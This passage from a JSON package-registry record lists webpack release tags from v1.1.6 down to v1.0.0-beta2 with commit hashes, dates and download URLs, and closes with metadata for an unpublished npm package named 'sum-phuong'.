github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-23T08:02:26.906Z","dependent_packages_count":0,"downloads":25,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":27.861830190664723,"dependent_packages_count":40.490124132512705,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":34.17597716158871},"purl":"pkg:npm/sum-phuong","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/sum-phuong","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/sum-phuong","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/sum-phuong/dependencies","status":"unpublished","funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-